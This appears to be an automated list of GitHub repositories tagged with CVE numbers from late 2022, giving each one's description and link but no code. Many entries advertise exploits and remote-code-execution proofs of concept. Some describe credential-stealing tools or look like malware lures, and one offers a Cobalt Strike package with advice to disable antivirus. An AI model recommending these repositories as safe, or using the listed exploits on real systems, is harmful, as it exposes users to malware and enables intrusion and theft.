**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4643 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4643](https://github.com/Live-Hack-CVE/CVE-2022-4643) create time: 2022-12-22T08:14:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4642 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4642](https://github.com/Live-Hack-CVE/CVE-2022-4642) create time: 2022-12-22T08:13:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4641 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4641](https://github.com/Live-Hack-CVE/CVE-2022-4641) create time: 2022-12-22T08:13:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4640 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4640](https://github.com/Live-Hack-CVE/CVE-2022-4640) create time: 2022-12-22T08:13:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4639 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4639](https://github.com/Live-Hack-CVE/CVE-2022-4639) create time: 2022-12-22T08:13:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4638 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4638](https://github.com/Live-Hack-CVE/CVE-2022-4638) create time: 2022-12-22T08:13:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4637 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4637](https://github.com/Live-Hack-CVE/CVE-2022-4637) create time: 2022-12-22T08:12:53Z

**CVE-2021-42287/CVE-2021-42278 Exploiter** : [TryA9ain/noPac](https://github.com/TryA9ain/noPac) create time: 2022-12-22T06:39:07Z

**this exemple of application permet to test the vunerability CVE_2017-5638** : [mfdev-solution/Exploit-CVE-2017-5638](https://github.com/mfdev-solution/Exploit-CVE-2017-5638) create time: 2022-12-21T21:14:12Z

**This repo provides a nice and easy way for linking an existing NFT smart contract to this minting dapp. There are two ways of using this repo, you can go the simple route or the more complex one. The simple route is so simple, all you need to do is download the build folder on the release page and change the configuration to fit your needs. (Follo** : [Karvoid/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft](https://github.com/Karvoid/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft) create time: 2022-12-21T18:26:46Z

**Vulnerability Disclosure Timeline Closer inspection of the Exploit JPG content reveals the malicious link as well as the URL Download and Execute of the tool used to generate the Exploit JPG from Python encrypted code content which we also implement in couple of our builders.Silent JPG Exploit There are multiple Exploit JPG in Silent JPG Exploit, a** : [Karvoid/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/Karvoid/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2022-12-21T18:16:51Z

**Get system info (Version, CPU, GPU, RAM, IPs, BSSID, Location, Screen metrics, Installed apps) Chromium based browsers (passwords, credit cards, cookies, history, autofill, bookmarks) Firefox based browsers (db files, cookies, history, bookmarks) Internet explorer/Edge (passwords) Saved wifi networks & scan networks around device (SSID, BSSID) s** : [Karvoid/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/Karvoid/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2022-12-21T18:15:56Z

**CVE-2022-0847** : [DataFox/CVE-2022-0847](https://github.com/DataFox/CVE-2022-0847) create time: 2022-12-21T16:34:18Z

**no description** : [heisefangkuai/CVE-2021-test2](https://github.com/heisefangkuai/CVE-2021-test2) create time: 2022-12-21T16:18:54Z

**no description** : [heisefangkuai/CVE-2021-test](https://github.com/heisefangkuai/CVE-2021-test) create time: 2022-12-21T16:17:23Z

**no description** : [devengpk/CVE-2022-1388](https://github.com/devengpk/CVE-2022-1388) create time: 2022-12-21T16:11:48Z

**CVE-2022-25765 pdfkit <0.8.6 command injection.** : [shamo0/PDFkit-CMD-Injection](https://github.com/shamo0/PDFkit-CMD-Injection) create time: 2022-12-20T14:59:41Z

**no description** : [cristiandrami/pentesterlab_CVE-2018-6574](https://github.com/cristiandrami/pentesterlab_CVE-2018-6574) create time: 2022-12-21T13:51:01Z

**no description** : [kinderscsaa/cve-2022-45511](https://github.com/kinderscsaa/cve-2022-45511) create time: 2022-12-21T14:06:20Z

**no description** : [hkzck/CVE-2022-14733](https://github.com/hkzck/CVE-2022-14733) create time: 2022-12-21T07:28:12Z

**CVE-2022-2602** : [LukeGix/CVE-2022-2602](https://github.com/LukeGix/CVE-2022-2602) create time: 2022-11-18T18:53:27Z

**maccms admin+ xss attacks** : [Cedric1314/CVE-2022-48870](https://github.com/Cedric1314/CVE-2022-48870) create time: 2022-12-21T01:40:11Z

**no description** : [SecurityWillCheck/CVE-2022-43271](https://github.com/SecurityWillCheck/CVE-2022-43271) create time: 2022-12-20T04:40:29Z

**no description** : [PyterSmithDarkGhost/CVE-2022-3382ROBOTICAEXPLOITPOC](https://github.com/PyterSmithDarkGhost/CVE-2022-3382ROBOTICAEXPLOITPOC) create time: 2022-12-20T22:01:50Z

**Cisco IOS XE Software for Catalyst 9800 Series Wireless Controllers IPv6 Denial of Service Vulnerability** : [lukejenkins/CVE-2021-34767](https://github.com/lukejenkins/CVE-2021-34767) create time: 2022-12-20T18:53:00Z

**no description** : [devengpk/CVE-2022-36804](https://github.com/devengpk/CVE-2022-36804) create time: 2022-12-20T17:55:19Z

**7-Zip CVE-2022-29072 Mitigation - CHM file - This script detects if the .chm file exists and removes it.** : [Phantomiman/7-Zip.chm-mitigiation](https://github.com/Phantomiman/7-Zip.chm-mitigiation) create time: 2022-12-20T15:30:12Z

**no description** : [pescepilota/CVE-2022-24086](https://github.com/pescepilota/CVE-2022-24086) create time: 2022-12-20T13:44:52Z

**no description** : [kiks7/CVE-2022-2602-Kernel-Exploit](https://github.com/kiks7/CVE-2022-2602-Kernel-Exploit) create time: 2022-12-20T12:16:38Z

**The vulnerability is in the SPNEGO Extended Negotiation (NEGOEX) Security Mechanism, which allows a client and server to negotiate the choice of security mechanism to use. This vulnerability is a pre-authentication remote code execution vulnerability impacting a wide range of protocols.** : [RCEman01/CVE-2022-37958-Windows-Server-RCE](https://github.com/RCEman01/CVE-2022-37958-Windows-Server-RCE) create time: 2022-12-20T09:37:08Z

**no description** : [ssst0n3/docker-cve-2022-39253-poc](https://github.com/ssst0n3/docker-cve-2022-39253-poc) create time: 2022-12-20T08:17:05Z

**no description** : [SURENKUMAR-0212/CVE-2022-0123](https://github.com/SURENKUMAR-0212/CVE-2022-0123) create time: 2022-12-19T12:54:43Z

**CVE-2021-21809 POC** : [anldori/CVE-2021-21809](https://github.com/anldori/CVE-2021-21809) create time: 2022-12-20T01:44:49Z

**🐍 Python Exploit for CVE-2021-45010** : [BKreisel/CVE-2021-45010](https://github.com/BKreisel/CVE-2021-45010) create time: 2022-12-20T00:47:30Z

**no description** : [Sabotase-Syndicate-Team/CVE-2017-5487.exploit](https://github.com/Sabotase-Syndicate-Team/CVE-2017-5487.exploit) create time: 2022-12-19T15:50:55Z

**no description** : [wh-gov/CVE-2022-44215](https://github.com/wh-gov/CVE-2022-44215) create time: 2022-12-19T10:10:54Z

**Public disclosure of TitanFTP 19.X Open Redirection vulnerability** : [JBalanza/CVE-2022-44215](https://github.com/JBalanza/CVE-2022-44215) create time: 2022-12-19T09:34:49Z

**CVE-2016-2338 Use-after-free nday full exploit** : [SpiralBL0CK/CVE-2016-2338-nday](https://github.com/SpiralBL0CK/CVE-2016-2338-nday) create time: 2022-12-19T07:34:25Z

**The MSI AmbientLink MsIo64 driver 1.0.0.8 has a Buffer Overflow (0x80102040, 0x80102044, 0x80102050,and 0x80102054).** : [Exploitables/CVE-2020-17382](https://github.com/Exploitables/CVE-2020-17382) create time: 2022-12-19T07:02:18Z

**no description** : [nidhihcl/external_expat_2.1.0_CVE-2022-43680](https://github.com/nidhihcl/external_expat_2.1.0_CVE-2022-43680) create time: 2022-12-19T05:09:12Z

**CVE 2022-46169** : [rb-x/CVE-2022-46169](https://github.com/rb-x/CVE-2022-46169) create time: 2022-12-18T18:28:52Z

**no description** : [devengpk/CVE-2022-29464](https://github.com/devengpk/CVE-2022-29464) create time: 2022-12-18T07:44:43Z

**Get root on macOS 13.0.1 with CVE-2022-46689 (macOS equivalent of the Dirty Cow bug), using the testcase extracted from Apple's XNU source.** : [zhuowei/MacDirtyCowDemo](https://github.com/zhuowei/MacDirtyCowDemo) create time: 2022-12-17T16:45:24Z

**Drupal CVE-2018-7600 RCE Pseudo-Shell PoC** : [r0lh/CVE-2018-7600](https://github.com/r0lh/CVE-2018-7600) create time: 2022-12-17T11:11:47Z

**Files and tools for CVE-2021-26258** : [zwclose/CVE-2021-26258](https://github.com/zwclose/CVE-2021-26258) create time: 2022-12-17T00:59:32Z

**writeup and PoC for (CVE-2022-41082/CVE-2022-41040) aka ProxyNotShell** : [LivingFree8/CVE-2022-41082-RCE-POC](https://github.com/LivingFree8/CVE-2022-41082-RCE-POC) create time: 2022-12-16T20:28:29Z

**CVE-2022-46169 - Cacti Blind Remote Code Execution (Pre-Auth)** : [taythebot/CVE-2022-46169](https://github.com/taythebot/CVE-2022-46169) create time: 2022-12-16T16:16:35Z

**Chương trình theo dõi, giám sát lưu lượng mạng được viết bằng Python, nó sẽ đưa ra cảnh báo khi phát hiện tấn công CVE-2017-0144** : [quynhold/DetectCVE20170144Attack](https://github.com/quynhold/DetectCVE20170144Attack) create time: 2022-12-16T11:10:13Z

**no description** : [z50913/CVE-2020-27955](https://github.com/z50913/CVE-2020-27955) create time: 2022-12-16T07:54:45Z

**Foxit PDF Reader Remote Code Execution Exploit** : [hacksysteam/CVE-2022-28672](https://github.com/hacksysteam/CVE-2022-28672) create time: 2022-12-02T18:52:20Z

**CVE-2017-9608 analysis** : [LaCinquette/practice-22-23](https://github.com/LaCinquette/practice-22-23) create time: 2022-12-16T04:13:11Z

**PoC for Acronis Arbitrary File Read - CVE-2022-45451** : [alfarom256/CVE-2022-45451](https://github.com/alfarom256/CVE-2022-45451) create time: 2022-12-15T19:16:20Z

**PoC exploit for CVE-2012-2982 implemented in Rust** : [0xTas/CVE-2012-2982](https://github.com/0xTas/CVE-2012-2982) create time: 2022-12-15T12:45:48Z

**no description** : [Trinadh465/external_expat-2.1.0_CVE-2022-43680](https://github.com/Trinadh465/external_expat-2.1.0_CVE-2022-43680) create time: 2022-12-15T11:52:14Z

**no description** : [Trinadh465/linux-3.0.35_CVE-2019-10220](https://github.com/Trinadh465/linux-3.0.35_CVE-2019-10220) create time: 2022-12-15T05:37:10Z

**CVE-2020-0796-利用工具** : [TweatherQ/CVE-2020-0796](https://github.com/TweatherQ/CVE-2020-0796) create time: 2022-12-15T04:55:56Z

**💣 CVE-2020-5398 - RFD(Reflected File Download) Attack for Spring MVC** : [motikan2010/CVE-2020-5398](https://github.com/motikan2010/CVE-2020-5398) create time: 2020-01-17T05:35:01Z

**Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE** : [Y4er/CVE-2020-2555](https://github.com/Y4er/CVE-2020-2555) create time: 2020-03-07T18:58:09Z

**no description** : [amitlttwo/CVE-2022-46381](https://github.com/amitlttwo/CVE-2022-46381) create time: 2022-12-14T20:07:52Z

**A Proof of Concept for the CVE-2021-27928 flaw exploitation** : [LalieA/CVE-2021-27928](https://github.com/LalieA/CVE-2021-27928) create time: 2022-12-14T17:36:38Z

**A Terraform module to launch Rancher 2.6.6 for blog article about CVE-2021-36782** : [fe-ax/tf-cve-2021-36782](https://github.com/fe-ax/tf-cve-2021-36782) create time: 2022-12-01T19:30:27Z

**CVE-2019-9053 exploit ported to python3** : [pedrojosenavasperez/CVE-2019-9053-Python3](https://github.com/pedrojosenavasperez/CVE-2019-9053-Python3) create time: 2022-12-14T12:50:54Z

**no description** : [Satheesh575555/external_zlib-1.2.7_CVE-2018-25032](https://github.com/Satheesh575555/external_zlib-1.2.7_CVE-2018-25032) create time: 2022-12-14T10:07:01Z

**no description** : [Trinadh465/linux_3.0.35_CVE-2019-10220](https://github.com/Trinadh465/linux_3.0.35_CVE-2019-10220) create time: 2022-12-14T09:41:21Z

**no description** : [Trinadh465/platform_device_renesas_kernel_AOSP10_r33_CVE-2019-10220](https://github.com/Trinadh465/platform_device_renesas_kernel_AOSP10_r33_CVE-2019-10220) create time: 2022-12-14T06:17:29Z

**Inspired by Ambassador on HackTheBox to exploit the now patched CVE-2021-43798** : [YourKeeper/SunScope](https://github.com/YourKeeper/SunScope) create time: 2022-12-14T05:11:57Z

**Pwndoc local file inclusion to remote code execution of Node.js code on the server** : [p0dalirius/CVE-2022-45771-Pwndoc-LFI-to-RCE](https://github.com/p0dalirius/CVE-2022-45771-Pwndoc-LFI-to-RCE) create time: 2022-12-13T10:03:14Z

**Improper access control in SAP NetWeaver Process Integration** : [redrays-io/CVE-2022-41272](https://github.com/redrays-io/CVE-2022-41272) create time: 2022-12-13T18:32:03Z

**no description** : [plharraud/cve-2022-3786](https://github.com/plharraud/cve-2022-3786) create time: 2022-12-13T16:43:01Z

**Exploit for CVE-2022-41717** : [domdom82/h2conn-exploit](https://github.com/domdom82/h2conn-exploit) create time: 2022-12-13T12:48:48Z

**Most common used CVE's by APT, legitimate RAT and other tools used by adversary ( cve-2019-11510 / cve-2019-19781 / cve-2020-5902 / cve-2021-1497 / cve-2021-20090 / cve-2021-22006 / cve-2021-22205 / cve-2021-26084 / cve-2021-26855 / cve-2021-26857 / cve-2021–26857 / cve-2021–26858 / cve-2021–26865 ... )** : [34zY/APT-Backpack](https://github.com/34zY/APT-Backpack) create time: 2022-12-13T08:41:44Z

**no description** : [nidhi7598/linux-4.1.15_CVE-2019-10220](https://github.com/nidhi7598/linux-4.1.15_CVE-2019-10220) create time: 2022-12-13T06:36:30Z

**no description** : [trhacknon/CVE-2019-19781](https://github.com/trhacknon/CVE-2019-19781) create time: 2022-12-13T05:38:14Z

**CVE-2022-46169 Cacti remote_agent.php Unauthenticated Command Injection.** : [0xf4n9x/CVE-2022-46169](https://github.com/0xf4n9x/CVE-2022-46169) create time: 2022-12-08T01:52:13Z

**CVE-2022-37042 Zimbra Auth Bypass leads to RCE** : [0xf4n9x/CVE-2022-37042](https://github.com/0xf4n9x/CVE-2022-37042) create time: 2022-10-24T10:10:45Z

**no description** : [trhacknon/CVE-2019-11510](https://github.com/trhacknon/CVE-2019-11510) create time: 2022-12-13T05:09:42Z

**no description** : [trhacknon/CVE-2020-5902-Scanner](https://github.com/trhacknon/CVE-2020-5902-Scanner) create time: 2022-12-13T04:42:11Z

**no description** : [Administrator-Xorex/CVE-2022-25845-Server](https://github.com/Administrator-Xorex/CVE-2022-25845-Server) create time: 2022-12-13T03:02:27Z

**CVE-2020-16846** : [hamza-boudouche/projet-secu](https://github.com/hamza-boudouche/projet-secu) create time: 2022-12-12T16:29:36Z

**no description** : [devengpk/CVE-2022-22965](https://github.com/devengpk/CVE-2022-22965) create time: 2022-12-12T16:30:05Z

**Proof of concept of the SQL injection vulnerability affecting the ZTE MF286R router.** : [v0lp3/CVE-2022-39066](https://github.com/v0lp3/CVE-2022-39066) create time: 2022-12-12T13:45:21Z

**no description** : [Karlos-12/Cvecek_20221212](https://github.com/Karlos-12/Cvecek_20221212) create time: 2022-12-12T11:23:17Z

**Created Research Report to HeapOver flow that CVE 2016-10191** : [KaviDk/Heap-Over-Flow-with-CVE-2016-10191](https://github.com/KaviDk/Heap-Over-Flow-with-CVE-2016-10191) create time: 2022-12-12T07:45:54Z

**no description** : [KaviDk/CVE-2019-6447-in-Mobile-Application](https://github.com/KaviDk/CVE-2019-6447-in-Mobile-Application) create time: 2022-12-12T07:10:51Z

**CVE-2007-4559 - Polemarch exploit** : [Ooscaar/MALW](https://github.com/Ooscaar/MALW) create time: 2022-10-21T06:38:41Z

**no description** : [IbrahimEkimIsik/CVE-2022-31403](https://github.com/IbrahimEkimIsik/CVE-2022-31403) create time: 2022-06-10T18:22:07Z

**writeup and PoC for CVE-2022-3236 (unauthenticated RCE in userportal and webadmin of sophos firewall)** : [subvers1on/CVE-2022-3236-RCE-PoC](https://github.com/subvers1on/CVE-2022-3236-RCE-PoC) create time: 2022-12-11T18:16:53Z

**If you are cloning the project then run this first, otherwise you can download the source code on the release page and skip this step. In order to make use of this dapp, all you need to do is change the configurations to point to your smart contract as well as update the images and theme file. For the most part all the changes will be in the publi** : [junyeong01/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft](https://github.com/junyeong01/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft) create time: 2022-12-11T16:04:23Z

**We have collectively determined that these vulnerabilities are available to individuals other than the person(s) who discovered them. An unknowable number of people having access to these vulnerabilities makes this a critical issue for everyone using this software.About CVE CVE was launched in 1999 when most information security tools used their ow** : [junyeong01/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/junyeong01/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2022-12-11T15:55:25Z

**Get system info (Version, CPU, GPU, RAM, IPs, BSSID, Location, Screen metrics, Installed apps) Chromium based browsers (passwords, credit cards, cookies, history, autofill, bookmarks) Firefox based browsers (db files, cookies, history, bookmarks) Internet explorer/Edge (passwords) Saved wifi networks & scan networks around device (SSID, BSSID) s** : [junyeong01/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/junyeong01/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2022-12-11T15:48:18Z

**PoC for Blind RCE for CVE-2022-25765 (Tested in HTB - Precious Machine)** : [LordRNA/CVE-2022-25765](https://github.com/LordRNA/CVE-2022-25765) create time: 2022-12-11T14:02:49Z

**no description** : [PyterSmithDarkGhost/ZERODAYENCADEAMENTOCVE2022-41040-CVE2022-41082](https://github.com/PyterSmithDarkGhost/ZERODAYENCADEAMENTOCVE2022-41040-CVE2022-41082) create time: 2022-12-10T20:00:22Z

**CVE-2022-42889 - Text4Shell exploit** : [gokul-ramesh/text4shell-exploit](https://github.com/gokul-ramesh/text4shell-exploit) create time: 2022-12-07T17:58:59Z

**This repo reproduce xss attack on django 4.0.1 (see CVE-2022-22818)** : [Prikalel/django-xss-example](https://github.com/Prikalel/django-xss-example) create time: 2022-12-10T12:38:08Z

**no description** : [JoshTech1000/CVE-Details_2022-Analysis](https://github.com/JoshTech1000/CVE-Details_2022-Analysis) create time: 2022-12-10T08:02:51Z

**CVE-2021-3129 Exploit Checker By ./MrMad** : [MadExploits/Laravel-debug-Checker](https://github.com/MadExploits/Laravel-debug-Checker) create time: 2022-12-10T03:32:34Z

**[PoC] Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)** : [yuriisanin/CVE-2022-45025](https://github.com/yuriisanin/CVE-2022-45025) create time: 2022-12-09T22:48:38Z

**POC of CVE-2022-36537** : [Malwareman007/CVE-2022-36537](https://github.com/Malwareman007/CVE-2022-36537) create time: 2022-12-09T14:15:52Z

**CVE-2022-36537** : [agnihackers/CVE-2022-36537-EXPLOIT](https://github.com/agnihackers/CVE-2022-36537-EXPLOIT) create time: 2022-12-09T11:29:26Z

**text4shell(CVE-2022-42889) BurpSuite Scanner** : [f0ng/text4shellburpscanner](https://github.com/f0ng/text4shellburpscanner) create time: 2022-12-09T08:18:19Z

**Scan IP ranges for IP's vulnerable to the F5 Big IP exploit (CVE-2022-1388)** : [M4fiaB0y/CVE-2022-1388](https://github.com/M4fiaB0y/CVE-2022-1388) create time: 2022-12-09T06:51:21Z

**no description** : [ssst0n3/docker-cve-2022-39253-poc](https://github.com/ssst0n3/docker-cve-2022-39253-poc) create time: 2022-12-09T05:59:29Z

**CTF based around CVE-2016-10033** : [eb613819/CTF_CVE-2016-10033](https://github.com/eb613819/CTF_CVE-2016-10033) create time: 2022-12-09T00:28:24Z

**no description** : [maikroservice/CVE-2022-45265](https://github.com/maikroservice/CVE-2022-45265) create time: 2022-11-08T13:13:25Z

**no description** : [ndmalc/CVE-2021-20323](https://github.com/ndmalc/CVE-2021-20323) create time: 2022-12-07T21:15:23Z

**no description** : [RoccoPearce/CVE-2022-30129](https://github.com/RoccoPearce/CVE-2022-30129) create time: 2022-12-07T17:46:14Z

**PHPunit Checker CVE-2017-9841 By MrMad** : [MadExploits/PHPunit-Exploit](https://github.com/MadExploits/PHPunit-Exploit) create time: 2022-12-07T11:26:16Z

**HashiCorp Consul exploit with python. (CVE-2021-41805)** : [I-Am-Nelson/CVE-2021-41805](https://github.com/I-Am-Nelson/CVE-2021-41805) create time: 2022-12-07T10:50:17Z

**CVE-2022-46169** : [imjdl/CVE-2022-46169](https://github.com/imjdl/CVE-2022-46169) create time: 2022-12-07T07:11:23Z

**no description** : [nidhi7598/frameworks_base_AOSP_10_r33_CVE-2022-20441](https://github.com/nidhi7598/frameworks_base_AOSP_10_r33_CVE-2022-20441) create time: 2022-12-07T05:31:35Z

**For CVE-2022-33891 Apache Spark: Emulation and Detection by West Shepherd** : [ps-interactive/lab_security_apache_spark_emulation_detection](https://github.com/ps-interactive/lab_security_apache_spark_emulation_detection) create time: 2022-12-06T23:44:30Z

**Local File Inclusion in WordPress Plugin Site Editor 1.1.1** : [JacobEbben/CVE-2018-7422](https://github.com/JacobEbben/CVE-2018-7422) create time: 2022-12-06T20:23:57Z

**no description** : [amitlttwo/CVE-2022-1388](https://github.com/amitlttwo/CVE-2022-1388) create time: 2022-12-06T16:59:56Z

**no description** : [amitlttwo/CVE-2022-31626](https://github.com/amitlttwo/CVE-2022-31626) create time: 2022-12-06T16:19:03Z

**A flaw was found in pki-core. Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests.** : [amitlttwo/CVE-2022-2414-Proof-Of-Concept](https://github.com/amitlttwo/CVE-2022-2414-Proof-Of-Concept) create time: 2022-12-06T14:37:08Z

**demo** : [sdfbjaksff/CVE-2022-11111111](https://github.com/sdfbjaksff/CVE-2022-11111111) create time: 2022-12-06T10:28:35Z

**no description** : [nidhi7598/linux-4.1.15_CVE-2019-10220](https://github.com/nidhi7598/linux-4.1.15_CVE-2019-10220) create time: 2022-12-06T07:19:09Z

**A CodeQL workshop covering CVE-2021-21380** : [advanced-security/codeql-workshop-cve-2021-21380](https://github.com/advanced-security/codeql-workshop-cve-2021-21380) create time: 2022-12-06T00:53:08Z

**Exploit for path transversal vulnerability in apache** : [TheKernelPanic/exploit-apache2-cve-2021-41773](https://github.com/TheKernelPanic/exploit-apache2-cve-2021-41773) create time: 2022-12-05T21:11:28Z

**no description** : [gmh5225/CVE-2022-44721-CsFalconUninstaller](https://github.com/gmh5225/CVE-2022-44721-CsFalconUninstaller) create time: 2022-12-03T11:04:17Z

**no description** : [nidhi7598/expat_2.1.0-_CVE-2022-43680](https://github.com/nidhi7598/expat_2.1.0-_CVE-2022-43680) create time: 2022-12-05T12:24:10Z

**no description** : [sdfbjaksff/CVE-2022-2022](https://github.com/sdfbjaksff/CVE-2022-2022) create time: 2022-12-05T11:25:16Z

**no description** : [HandsomeCat00/Spring-CVE-2010-1622](https://github.com/HandsomeCat00/Spring-CVE-2010-1622) create time: 2022-12-05T02:28:09Z

**no description** : [BassamGraini/CVE-2022-2588](https://github.com/BassamGraini/CVE-2022-2588) create time: 2022-12-04T22:10:57Z

**pdfkit <0.8.6 command injection shell. The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. (Tested on ver 0.8.6) - CVE-2022-25765** : [CyberArchitect1/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell](https://github.com/CyberArchitect1/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell) create time: 2022-12-04T21:00:05Z

**Exploit from perception point** : [sidrk01/cve-2016-0728](https://github.com/sidrk01/cve-2016-0728) create time: 2022-12-04T05:26:12Z

**CVE-2022-24112_POC** : [Acczdy/CVE-2022-24112_POC](https://github.com/Acczdy/CVE-2022-24112_POC) create time: 2022-12-03T14:31:28Z

**All details about CVE-2022-43097** : [nibin-m/CVE-2022-43097](https://github.com/nibin-m/CVE-2022-43097) create time: 2022-12-04T01:59:51Z

**full PoC of CVE-2021-44521** : [Yeyvo/poc-CVE-2021-44521](https://github.com/Yeyvo/poc-CVE-2021-44521) create time: 2022-12-03T21:35:30Z

**no description** : [mux0x/CVE-2018-6574](https://github.com/mux0x/CVE-2018-6574) create time: 2022-12-03T17:41:32Z

**no description** : [XiangSi-Howard/CTF---CVE-2011-2523](https://github.com/XiangSi-Howard/CTF---CVE-2011-2523) create time: 2022-12-03T14:47:52Z

**Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell) RCE** : [yevh/CVE-2020-5752-Druva-inSync-Windows-Client-6.6.3---Local-Privilege-Escalation-PowerShell-](https://github.com/yevh/CVE-2020-5752-Druva-inSync-Windows-Client-6.6.3---Local-Privilege-Escalation-PowerShell-) create time: 2021-11-21T08:30:24Z

**Python Exploit for CVE-2022-0739** : [BKreisel/CVE-2022-0739](https://github.com/BKreisel/CVE-2022-0739) create time: 2022-12-03T01:33:07Z

**no description** : [JoshMorrison99/CVE-2016-3714](https://github.com/JoshMorrison99/CVE-2016-3714) create time: 2022-12-02T20:19:46Z

**no description** : [purplededa/CVE-2022-44721-CsFalconUninstaller](https://github.com/purplededa/CVE-2022-44721-CsFalconUninstaller) create time: 2022-11-30T08:58:18Z

**writeup and PoC for (CVE-2022-41082/CVE-2022-41040) aka ProxyNotShell** : [Adynervi/CVE-2022-41082-RCE-PoC](https://github.com/Adynervi/CVE-2022-41082-RCE-PoC) create time: 2022-12-02T11:50:48Z

**no description** : [nidhi7598/G3_expat-2.2.6_CVE-2022-43680](https://github.com/nidhi7598/G3_expat-2.2.6_CVE-2022-43680) create time: 2022-12-02T08:26:04Z

**PoC for CVE-2014-0196** : [netwid/CVE-2014-0196](https://github.com/netwid/CVE-2014-0196) create time: 2022-12-01T22:56:53Z

**The first proof of concept of the Contao CMS RCE** : [Inplex-sys/CVE-2022-26265](https://github.com/Inplex-sys/CVE-2022-26265) create time: 2022-12-01T23:11:19Z

**no description** : [gscharf/CVE-2022-31007-Python-POC](https://github.com/gscharf/CVE-2022-31007-Python-POC) create time: 2022-12-01T22:53:59Z

**no description** : [SilasSpringer/CVE-2018-10933](https://github.com/SilasSpringer/CVE-2018-10933) create time: 2022-12-01T17:57:20Z

**A Zeek CVE-2022-24491 detector.** : [corelight/CVE-2022-24491](https://github.com/corelight/CVE-2022-24491) create time: 2022-04-13T12:40:57Z

**no description** : [lkduy2602/Detecting-CVE-2018-15708-Vulnerabilities](https://github.com/lkduy2602/Detecting-CVE-2018-15708-Vulnerabilities) create time: 2022-12-01T08:48:28Z

**Validation of Arbitrary File Read Vulnerabilities in Dell OpenManage Server Administrator (OMSA) - CVE-2016-4004, CVE-2021-21514 and CVE-2020-5377.** : [und3sc0n0c1d0/AFR-in-OMSA](https://github.com/und3sc0n0c1d0/AFR-in-OMSA) create time: 2022-11-30T22:34:58Z

**Reproducer PoC for FreeBSD dhclient heap-based buffer overflow vulnerability when parsing DHCP option 119 (CVE-2020-7461)** : [0xkol/freebsd-dhclient-poc](https://github.com/0xkol/freebsd-dhclient-poc) create time: 2022-11-30T19:03:57Z

**RCE exploit for CVE-2020-11896 (Ripple20 IP-in-IP Heap Overflow Vulnerability) targeting Digi Connect ME 9210** : [0xkol/ripple20-digi-connect-exploit](https://github.com/0xkol/ripple20-digi-connect-exploit) create time: 2022-11-30T18:44:25Z

**This is a test repo to see what automated scrapers/APIs will collect data on this repo, despite it being utterly meaningless info** : [NathanScottGithub/CVE-2022-41049-POC](https://github.com/NathanScottGithub/CVE-2022-41049-POC) create time: 2022-11-30T15:19:43Z

**可以利用這個版本本做CVE-2022-39197 RCE POC,以及其他的漏洞測試,請在解壓前關閉防禦病毒軟件,當然會被查殺** : [Trinity-SYT-SECURITY/coablt_strike_4.5](https://github.com/Trinity-SYT-SECURITY/coablt_strike_4.5) create time: 2022-11-30T13:16:43Z

**no description** : [Serz999/CVE-2015-3145](https://github.com/Serz999/CVE-2015-3145) create time: 2022-11-30T10:12:05Z

**no description** : [revanmalang/CVE-2022-1388](https://github.com/revanmalang/CVE-2022-1388) create time: 2022-11-30T04:06:56Z

**no description** : [NetJBS/-CVE-2020-0796-RCE](https://github.com/NetJBS/-CVE-2020-0796-RCE) create time: 2022-11-30T00:40:45Z

**流血你(BLEED YOU) A critical RCE vulnerability in Windows Internet Key Exchange (IKE) Protocol Extensions** : [sandpix/CVE-2022-34721-RCE-POC](https://github.com/sandpix/CVE-2022-34721-RCE-POC) create time: 2022-11-29T18:34:08Z

**no description** : [fei9747/CVE-2021-3493](https://github.com/fei9747/CVE-2021-3493) create time: 2022-11-29T12:56:00Z

